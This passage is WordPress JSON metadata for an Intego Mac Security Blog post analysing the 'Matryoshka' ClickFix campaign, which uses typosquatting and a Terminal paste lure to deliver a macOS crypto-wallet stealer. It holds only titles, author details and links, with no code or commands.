Internet","publisher":{"@id":"https:\/\/www.intego.com\/mac-security-blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.intego.com\/mac-security-blog\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"ImageObject","@id":"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#primaryimage","inLanguage":"en-US","url":"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2026\/02\/matryoshka-clickfix-terminal-installation-screenshot.png","contentUrl":"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2026\/02\/matryoshka-clickfix-terminal-installation-screenshot.png","width":473,"height":512,"caption":"Example of a ClickFix-style lure that instructs users to copy a Terminal command from a download page."},{"@type":"WebPage","@id":"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#webpage","url":"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/","name":"Unpacking the New \u201cMatryoshka\u201d ClickFix Variant: Typosquatting Campaign Delivers macOS Stealer - The Mac Security Blog Matryoshka ClickFix Variant Delivers macOS Stealer via Typosquatting","isPartOf":{"@id":"https:\/\/www.intego.com\/mac-security-blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#primaryimage"},"datePublished":"2026-02-12T10:22:54+00:00","dateModified":"2026-03-03T12:56:11+00:00","description":"Executive Summary Intego Antivirus Labs is tracking an evolution of the \u201cClickFix\u201d social engineering campaign targeting macOS users. Dubbed Matryoshka Intego analyzed the Matryoshka ClickFix variant using typosquatting and a Terminal paste lure to deliver an AppleScript stealer and target crypto wallets.","breadcrumb":{"@id":"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.intego.com\/mac-security-blog\/"},{"@type":"ListItem","position":2,"name":"Unpacking the New \u201cMatryoshka\u201d ClickFix Variant: Typosquatting Campaign Delivers macOS Stealer"}]},{"@type":"Article","@id":"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#article","isPartOf":{"@id":"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#webpage"},"author":{"@id":"https:\/\/www.intego.com\/mac-security-blog\/#\/schema\/person\/08c0037f7ab259cf049d6c332f30c5b2"},"headline":"Unpacking the New \u201cMatryoshka\u201d ClickFix Variant: Typosquatting Campaign Delivers macOS Stealer","datePublished":"2026-02-12T10:22:54+00:00","dateModified":"2026-03-03T12:56:11+00:00","mainEntityOfPage":{"@id":"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#webpage"},"wordCount":1193,"commentCount":0,"publisher":{"@id":"https:\/\/www.intego.com\/mac-security-blog\/#organization"},"image":{"@id":"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#primaryimage"},"thumbnailUrl":"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2026\/02\/matryoshka-clickfix-terminal-installation-screenshot.png","keywords":["ClickFix macOS malware AppleScript stealer typosquatting","crypto wallet"],"articleSection":["Malware","Security &amp; Privacy","Security News"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#respond"]}]},{"@type":"Person","@id":"https:\/\/www.intego.com\/mac-security-blog\/#\/schema\/person\/08c0037f7ab259cf049d6c332f30c5b2","name":"Frederic Blaison","image":{"@type":"ImageObject","@id":"https:\/\/www.intego.com\/mac-security-blog\/#personlogo","inLanguage":"en-US","url":"https:\/\/secure.gravatar.com\/avatar\/0f7a55283c5b8924a7e54b5d6191cd80?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/0f7a55283c5b8924a7e54b5d6191cd80?s=96&d=mm&r=g","caption":"Frederic Blaison"},"description":"Frederic is Intego\u2019s Antivirus Labs Tech Lead, overseeing research into macOS malware and persistent threats. With over 30 years of expertise in Apple technologies, Fred\u2019s background spans system administration, QA, and hands-on malware analysis, bringing deep technical insight to the front lines of macOS security.","url":"https:\/\/www.intego.com\/mac-security-blog\/author\/frederic-blaison\/"}]}},"jetpack_featured_media_url":"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2026\/02\/matryoshka-clickfix-terminal-installation-screenshot.png","jetpack_publicize_connections":[],"jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/p4VAYd-r54","amp_enabled":true,"_links":{"self":[{"href":"https:\/\/origin.intego.com\/mac-security-blog\/wp-json\/wp\/v2\/posts\/104102"}],"collection":[{"href":"https:\/\/origin.intego.com\/mac-security-blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/origin.intego.com\/mac-security-blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/origin.intego.com\/mac-security-blog\/wp-json\/wp\/v2\/users\/115"}],"replies":[{"embeddable":true,"href":"https:\/\/origin.intego.com\/mac-security-blog\/wp-json\/wp\/v2\/comments?post=104102"}],"version-history":[{"count":68,"href":"https:\/\/origin.intego.com\/mac-security-blog\/wp-json\/wp\/v2\/posts\/104102\/revisions"}],"predecessor-version":[{"id":104176,"href":"https:\/\/origin.intego.com\/mac-security-blog\/wp-json\/wp\/v2\/posts\/104102\/revisions\/104176"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/origin.intego.com\/mac-security-blog\/wp-json\/wp\/v2\/media\/104101"}],"wp:attachment":[{"href":"https:\/\/origin.intego.com\/mac-security-blog\/wp-json\/wp\/v2\/media?parent=104102"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/origin.intego.com\/mac-security-blog\/wp-json\/wp\/v2\/categories?post=104102"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/origin.intego.com\/mac-security-blog\/wp-json\/wp\/v2\/tags?post=104102"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}